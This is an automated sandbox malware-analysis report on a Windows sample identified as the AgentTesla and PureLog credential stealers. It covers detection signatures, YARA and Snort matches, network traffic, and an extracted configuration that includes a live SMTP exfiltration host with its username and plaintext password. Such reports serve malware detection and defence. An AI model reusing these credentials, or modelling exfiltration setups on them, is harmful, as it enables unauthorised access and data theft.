Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe
Analysis ID:	1431452
MD5:	946a0735432aca25fa370970e97a3dbb
SHA1:	9ffac6be378c7379a8ea11a5a439445a46f6bb5c
SHA256:	7628ace4f2627bc65377a8123ce9e05849e4e4b3fd5b862e03ffcee42274ccfb
Tags:	exe
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Allocates memory in foreign processes

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Outbound SMTP Connections

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe" MD5: 946A0735432ACA25FA370970E97A3DBB)

RegSvcs.exe (PID: 7404 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.nationalkham.com", "Username": "sales@nationalkham.com", "Password": "kham1234"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1688397215.0000000005890000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1686492613.0000000004239000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.4135337637.0000000002B95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe PID: 7256	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: RegSvcs.exe PID: 7404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7404	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.5890000.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4239970.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x323d1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x32443:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x324cd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3255f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x325c9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3263b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x326d1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x32761:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x341d1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6f9f1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xab011:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34243:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6fa63:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xab083:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x342cd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6faed:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xab10d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x3435f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6fb7f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xab19f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x343c9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6fbe9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xab209:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x3443b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6fc5b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xab27b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x344d1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6fcf1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xab311:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0xb11f1:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xeca11:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x128031:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xb1263:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xeca83:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1280a3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xb12ed:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xecb0d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x12812d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xb137f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xecb9f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1281bf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xb13e9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xecc09:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x128229:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xb145b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xecc7b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x12829b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xb14f1:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xecd11:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x128331:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x12e211:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x169a31:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1a5051:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x12e283:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x169aa3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1a50c3:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x12e30d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x169b2d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1a514d:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x12e39f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x169bbf:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1a51df:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x12e409:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x169c29:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1a5249:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x12e47b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x169c9b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1a52bb:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x12e511:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x169d31:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1a5351:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 14 entries

Sigma Signatures

System Summary

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 192.185.35.67, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7404, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.2.4 - Destination IP: 192.185.35.67

Timestamp:	04/25/24-07:17:01.018869
SID:	2851779
Source Port:	49735
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN AgentTesla Exfil Via SMTP - Source IP: 192.168.2.4 - Destination IP: 192.185.35.67

Timestamp:	04/25/24-07:17:01.018819
SID:	2030171
Source Port:	49735
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla CnC Exfil Activity - Source IP: 192.168.2.4 - Destination IP: 192.185.35.67

Timestamp:	04/25/24-07:17:01.018869
SID:	2855542
Source Port:	49735
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Agent Tesla Exfil via SMTP - Source IP: 192.168.2.4 - Destination IP: 192.185.35.67

Timestamp:	04/25/24-07:17:01.018869
SID:	2855245
Source Port:	49735
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 - Source IP: 192.168.2.4 - Destination IP: 192.185.35.67

Timestamp:	04/25/24-07:17:01.018869
SID:	2840032
Source Port:	49735
Destination Port:	587
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.nationalkham.com", "Username": "sales@nationalkham.com", "Password": "kham1234"}

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Virustotal: Detection: 25%

Perma Link

Machine Learning detection for sample

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Joe Sandbox ML: detected

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2

Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.4:49735 -> 192.185.35.67:587
Source: Traffic	Snort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.4:49735 -> 192.185.35.67:587
Source: Traffic	Snort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.4:49735 -> 192.185.35.67:587
Source: Traffic	Snort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.4:49735 -> 192.185.35.67:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49735 -> 192.185.35.67:587

Yara detected Generic Downloader

Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 208.95.112.1 208.95.112.1
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: ip-api.com

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: mail.nationalkham.com

Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4135337637.0000000002B81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002BBA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.nationalkham.com
Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688552621.0000000005B90000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1688788914.0000000007372000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe, 00000000.00000002.1686492613.0000000004C27000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: RegSvcs.exe, 00000002.00000002.4135337637.0000000002B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443

Source: unknown

HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, cPKWk.cs

.Net Code: NikjhBPi

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4f2b5e0.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4eae5c0.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe.4e315a0.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_017DE3B4	0_2_017DE3B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B508B0	0_2_07B508B0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B53767	0_2_07B53767
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B5C6B8	0_2_07B5C6B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B596E0	0_2_07B596E0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B5A643	0_2_07B5A643
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B5C280	0_2_07B5C280
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.PWSX-gen.25877.26069.exe	Code function: 0_2_07B5A20B	0_2_07B5A20B
